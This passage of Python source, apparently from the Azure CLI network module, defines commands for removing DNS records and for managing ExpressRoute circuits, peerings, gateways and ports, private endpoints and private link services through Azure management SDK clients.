def remove_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value,
flags, tag, keep_empty_record_set=False):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname,
keep_empty_record_set=False):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, keep_empty_record_set=keep_empty_record_set)
def remove_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
keep_empty_record_set=False):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, keep_empty_record_set=False):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value,
keep_empty_record_set=False):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def _check_a_record_exist(record, exist_list):
for r in exist_list:
if r.ipv4_address == record.ipv4_address:
return True
return False
def _check_aaaa_record_exist(record, exist_list):
for r in exist_list:
if r.ipv6_address == record.ipv6_address:
return True
return False
def _check_caa_record_exist(record, exist_list):
for r in exist_list:
if (r.flags == record.flags and
r.tag == record.tag and
r.value == record.value):
return True
return False
def _check_cname_record_exist(record, exist_list):
for r in exist_list:
if r.cname == record.cname:
return True
return False
def _check_mx_record_exist(record, exist_list):
for r in exist_list:
if (r.preference == record.preference and
r.exchange == record.exchange):
return True
return False
def _check_ns_record_exist(record, exist_list):
for r in exist_list:
if r.nsdname == record.nsdname:
return True
return False
def _check_ptr_record_exist(record, exist_list):
for r in exist_list:
if r.ptrdname == record.ptrdname:
return True
return False
def _check_srv_record_exist(record, exist_list):
for r in exist_list:
if (r.priority == record.priority and
r.weight == record.weight and
r.port == record.port and
r.target == record.target):
return True
return False
def _check_txt_record_exist(record, exist_list):
for r in exist_list:
if r.value == record.value:
return True
return False
def _record_exist_func(record_type):
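    # e.g. _record_exist_func('a') resolves to _check_a_record_exist via globals(); a
    # record type without a matching _check_<type>_record_exist helper in this module
    # would raise KeyError here.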
return globals()["_check_{}_record_exist".format(record_type)]
def _add_record(record_set, record, record_type, is_list=False):
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is None:
setattr(record_set, record_property, [])
record_list = getattr(record_set, record_property)
_record_exist = _record_exist_func(record_type)
if not _record_exist(record, record_list):
record_list.append(record)
else:
setattr(record_set, record_property, record)
def _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=True, subscription_id=None, ttl=None, if_none_match=None):
from azure.core.exceptions import HttpResponseError
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS,
subscription_id=subscription_id).record_sets
try:
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
except HttpResponseError:
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_set = RecordSet(ttl=3600)
if ttl is not None:
record_set.ttl = ttl
_add_record(record_set, record, record_type, is_list)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name,
record_type, record_set,
if_none_match='*' if if_none_match else None)
def _remove_record(cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set, is_list=True):
ncf = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is not None:
keep_list = [r for r in record_list
if not dict_matches_filter(r.__dict__, record.__dict__)]
if len(keep_list) == len(record_list):
raise CLIError('Record {} not found.'.format(str(record)))
setattr(record_set, record_property, keep_list)
else:
setattr(record_set, record_property, None)
if is_list:
records_remaining = len(getattr(record_set, record_property))
else:
records_remaining = 1 if getattr(record_set, record_property) is not None else 0
if not records_remaining and not keep_empty_record_set:
logger.info('Removing empty %s record set: %s', record_type, record_set_name)
return ncf.delete(resource_group_name, zone_name, record_set_name, record_type)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name, record_type, record_set)
def dict_matches_filter(d, filter_dict):
sentinel = object()
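    # Falsy values in filter_dict act as wildcards; e.g. (illustrative only)
    # dict_matches_filter({'ipv4_address': '1.2.3.4'},
    #                     {'ipv4_address': '1.2.3.4', 'ttl': None}) is True, while
    # populated keys must match by string comparison or, for list-valued fields such as
    # TXT record values, by multiset equality via lists_match.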
return all(not filter_dict.get(key, None) or
str(filter_dict[key]) == str(d.get(key, sentinel)) or
lists_match(filter_dict[key], d.get(key, []))
for key in filter_dict)
def lists_match(l1, l2):
try:
return Counter(l1) == Counter(l2) # pylint: disable=too-many-function-args
except TypeError:
return False
# endregion
# region ExpressRoutes
def create_express_route(cmd, circuit_name, resource_group_name, bandwidth_in_mbps, peering_location,
service_provider_name, location=None, tags=None, no_wait=False,
sku_family=None, sku_tier=None, allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
ExpressRouteCircuit, ExpressRouteCircuitSku, ExpressRouteCircuitServiceProviderProperties, SubResource = \
cmd.get_models(
'ExpressRouteCircuit', 'ExpressRouteCircuitSku', 'ExpressRouteCircuitServiceProviderProperties',
'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_circuits
sku_name = '{}_{}'.format(sku_tier, sku_family)
circuit = ExpressRouteCircuit(
location=location, tags=tags,
service_provider_properties=ExpressRouteCircuitServiceProviderProperties(
service_provider_name=service_provider_name,
peering_location=peering_location,
bandwidth_in_mbps=bandwidth_in_mbps if not express_route_port else None),
sku=ExpressRouteCircuitSku(name=sku_name, tier=sku_tier, family=sku_family),
allow_global_reach=allow_global_reach,
bandwidth_in_gbps=(int(bandwidth_in_mbps) / 1000) if express_route_port else None
)
    if cmd.supported_api_version(min_api='2017-10-01') and allow_classic_operations is not None:
circuit.allow_classic_operations = allow_classic_operations
if cmd.supported_api_version(min_api='2018-08-01') and express_route_port:
circuit.express_route_port = SubResource(id=express_route_port)
circuit.service_provider_properties = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, circuit_name, circuit)
def update_express_route(instance, cmd, bandwidth_in_mbps=None, peering_location=None,
service_provider_name=None, sku_family=None, sku_tier=None, tags=None,
allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
with cmd.update_context(instance) as c:
c.set_param('allow_classic_operations', allow_classic_operations)
c.set_param('tags', tags)
c.set_param('allow_global_reach', allow_global_reach)
with cmd.update_context(instance.sku) as c:
c.set_param('family', sku_family)
c.set_param('tier', sku_tier)
with cmd.update_context(instance.service_provider_properties) as c:
c.set_param('peering_location', peering_location)
c.set_param('service_provider_name', service_provider_name)
if express_route_port is not None:
SubResource = cmd.get_models('SubResource')
instance.express_route_port = SubResource(id=express_route_port)
instance.service_provider_properties = None
if bandwidth_in_mbps is not None:
if not instance.express_route_port:
            instance.service_provider_properties.bandwidth_in_mbps = float(bandwidth_in_mbps)
else:
instance.bandwidth_in_gbps = (float(bandwidth_in_mbps) / 1000)
return instance
def create_express_route_peering_connection(cmd, resource_group_name, circuit_name, peering_name, connection_name,
peer_circuit, address_prefix, authorization_key=None):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
ExpressRouteCircuitConnection, SubResource = cmd.get_models('ExpressRouteCircuitConnection', 'SubResource')
source_circuit = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='expressRouteCircuits',
name=circuit_name,
child_type_1='peerings',
child_name_1=peering_name
)
conn = ExpressRouteCircuitConnection(
express_route_circuit_peering=SubResource(id=source_circuit),
peer_express_route_circuit_peering=SubResource(id=peer_circuit),
address_prefix=address_prefix,
authorization_key=authorization_key
)
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def set_express_route_peering_connection_config(cmd, resource_group_name, circuit_name, peering_name, connection_name,
address_prefix):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
# Get Conn
try:
conn = client.get(resource_group_name, circuit_name, peering_name, connection_name)
except ResourceNotFoundError:
raise ResourceNotFoundError("Peering Connection {} doesn't exist".format(connection_name))
Ipv6CircuitConnectionConfig = cmd.get_models('Ipv6CircuitConnectionConfig')
ipv6_config = Ipv6CircuitConnectionConfig(
address_prefix=address_prefix
)
conn.ipv6_circuit_connection_config = ipv6_config
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def remove_express_route_peering_connection_config(cmd, resource_group_name, circuit_name, peering_name,
connection_name):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
# Get Conn
try:
conn = client.get(resource_group_name, circuit_name, peering_name, connection_name)
except ResourceNotFoundError:
raise ResourceNotFoundError("Peering Connection {} doesn't exist".format(connection_name))
conn.ipv6_circuit_connection_config = None
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def _validate_ipv6_address_prefixes(prefixes):
from ipaddress import ip_network, IPv6Network
prefixes = prefixes if isinstance(prefixes, list) else [prefixes]
version = None
for prefix in prefixes:
try:
network = ip_network(prefix)
if version is None:
version = type(network)
else:
if not isinstance(network, version): # pylint: disable=isinstance-second-argument-not-valid-type
raise CLIError("usage error: '{}' incompatible mix of IPv4 and IPv6 address prefixes."
.format(prefixes))
except ValueError:
raise CLIError("usage error: prefix '{}' is not recognized as an IPv4 or IPv6 address prefix."
.format(prefix))
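    # True when every prefix parsed as IPv6; False when all are IPv4 (a mix raises above).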
return version == IPv6Network
def create_express_route_peering(
cmd, client, resource_group_name, circuit_name, peering_type, peer_asn, vlan_id,
primary_peer_address_prefix, secondary_peer_address_prefix, shared_key=None,
advertised_public_prefixes=None, customer_asn=None, routing_registry_name=None,
route_filter=None, legacy_mode=None, ip_version='IPv4'):
(ExpressRouteCircuitPeering, ExpressRouteCircuitPeeringConfig, RouteFilter) = \
cmd.get_models('ExpressRouteCircuitPeering', 'ExpressRouteCircuitPeeringConfig', 'RouteFilter')
if cmd.supported_api_version(min_api='2018-02-01'):
ExpressRoutePeeringType = cmd.get_models('ExpressRoutePeeringType')
else:
ExpressRoutePeeringType = cmd.get_models('ExpressRouteCircuitPeeringType')
if ip_version == 'IPv6' and cmd.supported_api_version(min_api='2020-08-01'):
Ipv6ExpressRouteCircuitPeeringConfig = cmd.get_models('Ipv6ExpressRouteCircuitPeeringConfig')
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
microsoft_config = ExpressRouteCircuitPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
else:
microsoft_config = None
ipv6 = Ipv6ExpressRouteCircuitPeeringConfig(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
peering = ExpressRouteCircuitPeering(peering_type=peering_type, ipv6_peering_config=ipv6, peer_asn=peer_asn,
vlan_id=vlan_id)
else:
peering = ExpressRouteCircuitPeering(
peering_type=peering_type, peer_asn=peer_asn, vlan_id=vlan_id,
primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
shared_key=shared_key)
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
peering.microsoft_peering_config = ExpressRouteCircuitPeeringConfig(
advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
if cmd.supported_api_version(min_api='2016-12-01') and route_filter:
peering.route_filter = RouteFilter(id=route_filter)
if cmd.supported_api_version(min_api='2017-10-01') and legacy_mode is not None:
peering.microsoft_peering_config.legacy_mode = legacy_mode
return client.begin_create_or_update(resource_group_name, circuit_name, peering_type, peering)
def _create_or_update_ipv6_peering(cmd, config, primary_peer_address_prefix, secondary_peer_address_prefix,
route_filter, advertised_public_prefixes, customer_asn, routing_registry_name):
if config:
# update scenario
with cmd.update_context(config) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
if route_filter:
RouteFilter = cmd.get_models('RouteFilter')
config.route_filter = RouteFilter(id=route_filter)
else:
# create scenario
IPv6Config, MicrosoftPeeringConfig = cmd.get_models(
'Ipv6ExpressRouteCircuitPeeringConfig', 'ExpressRouteCircuitPeeringConfig')
microsoft_config = MicrosoftPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
config = IPv6Config(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
return config
def update_express_route_peering(cmd, instance, peer_asn=None, primary_peer_address_prefix=None,
secondary_peer_address_prefix=None, vlan_id=None, shared_key=None,
advertised_public_prefixes=None, customer_asn=None,
routing_registry_name=None, route_filter=None, ip_version='IPv4',
legacy_mode=None):
# update settings common to all peering types
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('vlan_id', vlan_id)
c.set_param('shared_key', shared_key)
if ip_version == 'IPv6':
# update is the only way to add IPv6 peering options
instance.ipv6_peering_config = _create_or_update_ipv6_peering(cmd, instance.ipv6_peering_config,
primary_peer_address_prefix,
secondary_peer_address_prefix, route_filter,
advertised_public_prefixes, customer_asn,
routing_registry_name)
else:
# IPv4 Microsoft Peering (or non-Microsoft Peering)
with cmd.update_context(instance) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
if route_filter is not None:
RouteFilter = cmd.get_models('RouteFilter')
instance.route_filter = RouteFilter(id=route_filter)
try:
with cmd.update_context(instance.microsoft_peering_config) as c:
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
c.set_param('legacy_mode', legacy_mode)
except AttributeError:
raise CLIError('--advertised-public-prefixes, --customer-asn, --routing-registry-name and '
'--legacy-mode are only applicable for Microsoft Peering.')
return instance
# endregion
# region ExpressRoute Connection
# pylint: disable=unused-argument
def create_express_route_connection(cmd, resource_group_name, express_route_gateway_name, connection_name,
peering, circuit_name=None, authorization_key=None, routing_weight=None,
enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
ExpressRouteConnection, SubResource, RoutingConfiguration, PropagatedRouteTable\
= cmd.get_models('ExpressRouteConnection', 'SubResource', 'RoutingConfiguration', 'PropagatedRouteTable')
client = network_client_factory(cmd.cli_ctx).express_route_connections
propagated_route_tables = PropagatedRouteTable(
labels=labels,
ids=[SubResource(id=propagated_route_table) for propagated_route_table in
propagated_route_tables] if propagated_route_tables else None
)
routing_configuration = RoutingConfiguration(
associated_route_table=SubResource(id=associated_route_table),
propagated_route_tables=propagated_route_tables
)
connection = ExpressRouteConnection(
name=connection_name,
express_route_circuit_peering=SubResource(id=peering) if peering else None,
authorization_key=authorization_key,
routing_weight=routing_weight,
routing_configuration=routing_configuration
)
if enable_internet_security and cmd.supported_api_version(min_api='2019-09-01'):
connection.enable_internet_security = enable_internet_security
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, connection_name, connection)
# pylint: disable=unused-argument
def update_express_route_connection(instance, cmd, circuit_name=None, peering=None, authorization_key=None,
routing_weight=None, enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
SubResource = cmd.get_models('SubResource')
if peering is not None:
        instance.express_route_circuit_peering = SubResource(id=peering)
if authorization_key is not None:
instance.authorization_key = authorization_key
if routing_weight is not None:
instance.routing_weight = routing_weight
if enable_internet_security is not None and cmd.supported_api_version(min_api='2019-09-01'):
instance.enable_internet_security = enable_internet_security
if associated_route_table is not None or propagated_route_tables is not None or labels is not None:
if instance.routing_configuration is None:
RoutingConfiguration = cmd.get_models('RoutingConfiguration')
instance.routing_configuration = RoutingConfiguration()
if associated_route_table is not None:
instance.routing_configuration.associated_route_table = SubResource(id=associated_route_table)
if propagated_route_tables is not None or labels is not None:
if instance.routing_configuration.propagated_route_tables is None:
PropagatedRouteTable = cmd.get_models('PropagatedRouteTable')
instance.routing_configuration.propagated_route_tables = PropagatedRouteTable()
if propagated_route_tables is not None:
instance.routing_configuration.propagated_route_tables.ids = [SubResource(id=propagated_route_table) for propagated_route_table in propagated_route_tables] # pylint: disable=line-too-long
if labels is not None:
instance.routing_configuration.propagated_route_tables.labels = labels
return instance
# endregion
# region ExpressRoute Gateways
def create_express_route_gateway(cmd, resource_group_name, express_route_gateway_name, location=None, tags=None,
min_val=2, max_val=None, virtual_hub=None):
ExpressRouteGateway, SubResource = cmd.get_models('ExpressRouteGateway', 'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_gateways
gateway = ExpressRouteGateway(
location=location,
tags=tags,
virtual_hub=SubResource(id=virtual_hub) if virtual_hub else None
)
    if min_val or max_val:
gateway.auto_scale_configuration = {'bounds': {'min': min_val, 'max': max_val}}
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, gateway)
def update_express_route_gateway(instance, cmd, tags=None, min_val=None, max_val=None):
def _ensure_autoscale():
if not instance.auto_scale_configuration:
ExpressRouteGatewayPropertiesAutoScaleConfiguration, \
ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds = cmd.get_models(
'ExpressRouteGatewayPropertiesAutoScaleConfiguration',
'ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds')
instance.auto_scale_configuration = ExpressRouteGatewayPropertiesAutoScaleConfiguration(
                bounds=ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds(min=min_val, max=max_val))
if tags is not None:
instance.tags = tags
    if min_val is not None:
_ensure_autoscale()
instance.auto_scale_configuration.bounds.min = min_val
    if max_val is not None:
_ensure_autoscale()
instance.auto_scale_configuration.bounds.max = max_val
return instance
def list_express_route_gateways(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_gateways
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
# endregion
# region ExpressRoute ports
def create_express_route_port(cmd, resource_group_name, express_route_port_name, location=None, tags=None,
peering_location=None, bandwidth_in_gbps=None, encapsulation=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ExpressRoutePort = cmd.get_models('ExpressRoutePort')
if bandwidth_in_gbps is not None:
bandwidth_in_gbps = int(bandwidth_in_gbps)
port = ExpressRoutePort(
location=location,
tags=tags,
peering_location=peering_location,
bandwidth_in_gbps=bandwidth_in_gbps,
encapsulation=encapsulation
)
return client.begin_create_or_update(resource_group_name, express_route_port_name, port)
def update_express_route_port(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags, True)
return instance
def download_generated_loa_as_pdf(cmd,
resource_group_name,
express_route_port_name,
customer_name,
file_path='loa.pdf'):
import os
import base64
dirname, basename = os.path.dirname(file_path), os.path.basename(file_path)
if basename == '':
basename = 'loa.pdf'
    elif not basename.endswith('.pdf'):
basename = basename + '.pdf'
file_path = os.path.join(dirname, basename)
generate_express_route_ports_loa_request =\
cmd.get_models('GenerateExpressRoutePortsLOARequest')(customer_name=customer_name)
client = network_client_factory(cmd.cli_ctx).express_route_ports
response = client.generate_loa(resource_group_name, express_route_port_name,
generate_express_route_ports_loa_request)
encoded_content = base64.b64decode(response.encoded_content)
from azure.cli.core.azclierror import FileOperationError
try:
with open(file_path, 'wb') as f:
f.write(encoded_content)
except OSError as ex:
raise FileOperationError(ex)
logger.warning("The generated letter of authorization is saved at %s", file_path)
def list_express_route_ports(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def assign_express_route_port_identity(cmd, resource_group_name, express_route_port_name,
user_assigned_identity, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
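    # The user-assigned identity value model carries an autogenerated swagger name in this API version.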
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity', 'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
user_assigned_identity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
user_assigned_identities_instance = dict()
user_assigned_identities_instance[user_assigned_identity] = user_assigned_identity_instance
identity_instance = ManagedServiceIdentity(type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance)
ports.identity = identity_instance
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def remove_express_route_port_identity(cmd, resource_group_name, express_route_port_name, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
if ports.identity is None:
logger.warning("The identity of the ExpressRoute Port doesn't exist.")
return ports
ports.identity = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def show_express_route_port_identity(cmd, resource_group_name, express_route_port_name):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
return ports.identity
def update_express_route_port_link(cmd, instance, parent, express_route_port_name, link_name,
macsec_cak_secret_identifier=None, macsec_ckn_secret_identifier=None,
macsec_sci_state=None, macsec_cipher=None, admin_state=None):
"""
:param cmd:
:param instance: an instance of ExpressRoutePort
:param express_route_port_name:
:param link_name:
:param macsec_cak_secret_identifier:
:param macsec_ckn_secret_identifier:
:param macsec_cipher:
:param admin_state:
:return:
"""
if any([macsec_cak_secret_identifier, macsec_ckn_secret_identifier, macsec_cipher, macsec_sci_state]):
instance.mac_sec_config.cak_secret_identifier = macsec_cak_secret_identifier
instance.mac_sec_config.ckn_secret_identifier = macsec_ckn_secret_identifier
# TODO https://github.com/Azure/azure-rest-api-specs/issues/7569
# need to remove this conversion when the issue is fixed.
if macsec_cipher is not None:
macsec_ciphers_tmp = {'gcm-aes-128': 'GcmAes128', 'gcm-aes-256': 'GcmAes256'}
macsec_cipher = macsec_ciphers_tmp.get(macsec_cipher, macsec_cipher)
instance.mac_sec_config.cipher = macsec_cipher
instance.mac_sec_config.sci_state = macsec_sci_state
if admin_state is not None:
instance.admin_state = admin_state
return parent
# endregion
# region PrivateEndpoint
def create_private_endpoint(cmd, resource_group_name, private_endpoint_name, subnet,
private_connection_resource_id, connection_name, group_ids=None,
virtual_network_name=None, tags=None, location=None,
request_message=None, manual_request=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
PrivateEndpoint, Subnet, PrivateLinkServiceConnection = cmd.get_models('PrivateEndpoint',
'Subnet',
'PrivateLinkServiceConnection')
pls_connection = PrivateLinkServiceConnection(private_link_service_id=private_connection_resource_id,
group_ids=group_ids,
request_message=request_message,
name=connection_name)
private_endpoint = PrivateEndpoint(
location=location,
tags=tags,
subnet=Subnet(id=subnet)
)
if manual_request:
private_endpoint.manual_private_link_service_connections = [pls_connection]
else:
private_endpoint.private_link_service_connections = [pls_connection]
if edge_zone:
private_endpoint.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def update_private_endpoint(instance, cmd, tags=None, request_message=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
if request_message is not None:
if instance.private_link_service_connections:
instance.private_link_service_connections[0].request_message = request_message
else:
instance.manual_private_link_service_connections[0].request_message = request_message
return instance
def list_private_endpoints(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def create_private_endpoint_private_dns_zone_group(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneGroup, PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneGroup', 'PrivateDnsZoneConfig')
private_dns_zone_group = PrivateDnsZoneGroup(name=private_dns_zone_group_name,
private_dns_zone_configs=[PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, # pylint: disable=line-too-long
name=private_dns_zone_name)]) # pylint: disable=line-too-long
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def add_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneConfig')
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone = PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, name=private_dns_zone_name)
private_dns_zone_group.private_dns_zone_configs.append(private_dns_zone)
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def remove_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone_configs = [item for item in private_dns_zone_group.private_dns_zone_configs if item.name != private_dns_zone_name] # pylint: disable=line-too-long
private_dns_zone_group.private_dns_zone_configs = private_dns_zone_configs
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
# endregion
# region PrivateLinkService
def create_private_link_service(cmd, resource_group_name, service_name, subnet, frontend_ip_configurations,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
virtual_network_name=None, public_ip_address=None,
location=None, tags=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None,
enable_proxy_protocol=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
FrontendIPConfiguration, PrivateLinkService, PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = \
cmd.get_models('FrontendIPConfiguration', 'PrivateLinkService', 'PrivateLinkServiceIpConfiguration',
'PublicIPAddress', 'Subnet')
pls_ip_config = PrivateLinkServiceIpConfiguration(
name='{}_ipconfig_0'.format(service_name),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service = PrivateLinkService(
location=location,
load_balancer_frontend_ip_configurations=frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
],
ip_configurations=[pls_ip_config],
        visibility=visibility,
auto_approval=auto_approval,
fqdns=fqdns,
tags=tags,
enable_proxy_protocol=enable_proxy_protocol
)
if edge_zone:
link_service.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def update_private_link_service(instance, cmd, tags=None, frontend_ip_configurations=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None, enable_proxy_protocol=None):
FrontendIPConfiguration = cmd.get_models('FrontendIPConfiguration')
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('load_balancer_frontend_ip_configurations', frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
])
c.set_param('visibility', visibility)
c.set_param('auto_approval', auto_approval)
